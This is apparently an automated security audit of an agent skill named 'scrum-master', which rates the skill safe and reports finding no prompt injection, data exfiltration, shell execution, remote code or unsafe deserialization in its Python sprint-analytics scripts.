scrum-master
Pass
Audited by Gen Agent Trust Hub on Mar 9, 2026
Risk Level: SAFE
Full Analysis
- [SAFE]: The analysis of all skill components, including the Python scripts and Markdown assets, revealed no security issues. The skill functions as intended for project management analytics.
- [PROMPT_INJECTION]: The
SKILL.mdfile and reference documents contain only instructional content and methodological frameworks. There are no attempts to override agent behavior, bypass safety filters, or extract system prompts. - [DATA_EXFILTRATION]: The Python scripts (
velocity_analyzer.py,sprint_health_scorer.py, andretrospective_analyzer.py) are strictly analytical. They do not perform network requests, hardcode credentials, or access sensitive system paths (e.g., SSH keys or environment files). - [COMMAND_EXECUTION]: All provided scripts utilize the Python Standard Library for mathematical and statistical operations. There is no usage of
subprocess,os.system, or other mechanisms to execute arbitrary shell commands or external binaries. - [REMOTE_CODE_EXECUTION]: The skill does not download or execute remote code. All logic is contained within the local Python files.
- [DYNAMIC_EXECUTION]: The scripts do not use dangerous functions like
eval(),exec(), or unsafe deserialization methods (e.g.,pickle). JSON data is parsed using the standardjson.load()function. - [INDIRECT_PROMPT_INJECTION]: While the skill processes external data (
sprint_data.json), it lacks the capabilities (network or file-write) necessary to exploit such data. The ingestion process is limited to calculating numerical metrics.
Audit Metadata